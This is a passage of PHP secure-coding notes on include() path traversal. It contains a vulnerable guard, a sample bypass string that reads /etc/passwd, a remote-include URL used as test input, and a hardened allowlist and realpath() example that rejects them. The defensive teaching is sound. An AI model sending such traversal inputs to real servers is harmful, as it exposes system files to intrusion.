if ( file_exists($page) AND !preg_match("#^\.\./#",$page) )
    include($page);
?>
won't make it any safer. ( Think of $page = 'pages/../../../etc/passwd' )
To be sure only pages you want the user to call are called, use something like this:
<?php
$path = 'pages/';
$extension = '.php';
if ( preg_match("#^[a-z0-9_]+$#i",$page) ){
    $filename = $path.$page.$extension;
    include($filename);
}
?>
This will only make sure only files from the directory $path are called if they have the file extension $extension.
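An added example, not part of the notes above: one way to combine the name allowlist from this note with a realpath() containment check, so that the traversal string quoted here and the remote URL from the earlier remote-include note are both rejected. The function name resolvePage and the temporary demo tree are assumptions made for the example, and symlink() is assumed to be available (as on Linux).

```php
<?php
// Added example: map a request parameter to a file under one directory.
// resolvePage() and the demo tree below are constructed for illustration.
function resolvePage(string $page, string $baseDir): ?string
{
    // Allowlist the name. No "/", ".", ":" or NUL can pass, which rules out
    // "../" traversal and "http://" URLs; the D modifier also rejects a
    // trailing newline, which a bare "$" would let through.
    if (!preg_match('#^[a-z0-9_]+$#iD', $page)) {
        return null;
    }
    // Resolve symlinks, then confirm the result is still inside $baseDir.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $target === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // a symlink led outside the pages directory
    }
    return $target;
}

// Demo tree: pages/news.php, plus a symlink in pages/ that points outside it.
$root = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/news.php", "<?php echo 'news';\n");
file_put_contents("$root/private.php", "<?php echo 'private';\n");
symlink("$root/private.php", "$root/pages/leak.php");

$requests = ['news', 'leak', 'missing', '../private',
             'pages/../../../etc/passwd', 'http://server_b/list', "news\n"];
foreach ($requests as $page) {
    $file = resolvePage($page, "$root/pages");
    printf("%-30s %s\n", json_encode($page), $file === null ? 'rejected' : 'include ' . $file);
}

// Remove the demo tree again.
unlink("$root/pages/leak.php");
unlink("$root/pages/news.php");
unlink("$root/private.php");
rmdir("$root/pages");
rmdir($root);
```

With allow_url_include set to Off in php.ini, PHP refuses URL includes at the interpreter level as well.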